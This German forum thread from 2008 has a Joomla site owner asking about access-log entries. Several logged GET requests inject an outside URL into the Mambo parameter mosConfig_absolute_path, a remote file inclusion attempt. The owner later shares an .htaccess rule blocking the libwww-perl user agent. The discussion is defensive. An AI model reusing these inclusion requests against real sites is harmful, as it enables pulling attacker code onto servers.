[reopen] Starker Zugriff von LIBWWW auf meine joomla Website

framp · 29 Jan. 2008

Code:

vs160182.vserver.de - - [28/Jan/2008:10:37:50 +0100] "GET /index.php/content/section/1/2//?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 200 10553 "-" "libwww-perl/5.65"
die-domain-4you.de - - [28/Jan/2008:10:37:51 +0100] "GET /index.php/content/section/1/2//?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 200 10553 "-" "libwww-perl/5.803"
static-ip-50-188-172-217.inaddr.intergenia.de - - [28/Jan/2008:10:39:17 +0100] "GET /index.php/content/view/139/1//?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 200 17724 "-" "libwww-perl/5.69"
online-gilde.de - - [28/Jan/2008:10:57:14 +0100] "GET /index.php/content/blogcategory/43/99//?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 200 25490 "-" "libwww-perl/5.805"

Diese Logs sehe ich seit ca 1 Woche gehäuft bei meiner Webseite. Googeln brachte, dass das wohl Scriptkiddies sind, die irgendwas versuchen.

Weiss jemand was die Requests bedeuten - vor allen Dingen da in den Requests wieder URLs stehen?
Ich überlege per .htaccess LIBWWW auszusperren. Ich weiss, die Browser ID kann man auch ändern - aber so sind die meissten Versuche geblocked. Sperre ich da auch andere nicht boeswillig eingestellten Leute/Bots aus?

jengelh · 30 Jan. 2008

Code:

man LWP

ja, damit könntest du u.U. legitime User aussperren. Aber wer holt sich schon mit wget-ähnlichen Methoden Webpages? Sind doch ganz eindeutig Kiddies. Googelst du nach "mosConfig_absolute_path" siehst du, dass das zum Mambo CMS gehört - und weil einige CMS sicherheitstechnisch ziemlich im Minus sein können (Query-Felder sind eine wichtige Sache - und werden viel zu oft am falschen Platz verwendet), ließe sich u.U. über absolute_path das Filesystem auslesen oder sonstiger Mist anstellen.

framp · 30 Jan. 2008

jengelh schrieb:
ja, damit könntest du u.U. legitime User aussperren. Aber wer holt sich schon mit wget-ähnlichen Methoden Webpages? Sind doch ganz eindeutig Kiddies.

So denke ich ja auch. Nur frage ich mich, ob es auch Suchmaschinerobots gibt, die libwww benutzen, denn die will ich ja nicht aussperren.

framp · 31 Jan. 2008

Seit ein paar Tagen habe ich libWWW ausgesperrt. Nun ist Ruhe 8).

Wie? Edit von .htaccess und Einfügen von

Code:

BrowserMatchNoCase "^libwww-perl" botnetz
order allow,deny
allow from all
deny from env=botnetz

jengelh · 1 Feb. 2008

Das sind eindeutig Kids. Keine vernünftige Suchmaschine ruft in einem Joomla-CMS Mambo-CMS-Parameter auf - zumindest nicht in dieser Quantität.

framp · 1 Feb. 2008

Der Anzahl Zugriffe auf den o.g. Link nach ist das ein allgemeines Problem.

Wie schon oben gesagt: Kick wwwlib from your joomla website - and you are clean :lol:

framp · 2 März 2008

Heute scheint jemand gegen 15:45 aus Italien meine Webseite mit 3 parallel laufenden Threads abgesucht zu haben. Das 2*mit dem IE 6.0 und 1* mit dem IE 7.0 - also kein libwww. Aber das kann man ja recht wie oben gesagt leider schnell ändern.

Ausserdem ist jemand von diesem Thread meinem Link zur Lösung gefolgt. Mal sehen was das Weblog morgen an Details ans Licht fördert ...

framp · 3 März 2008

Heute um 8:30 von Belgien...

Wieder 3 Threads, 2 mal IE 6.0, 1 mal 7.0 ...

der scheint von Italien nach Belgien umgezogen zu sein :shock:

[reopen] Starker Zugriff von LIBWWW auf meine joomla Website

framp

Moderator

jengelh

Guru

framp

Moderator

framp

Moderator

jengelh

Guru

framp

Moderator

framp

Moderator

framp

Moderator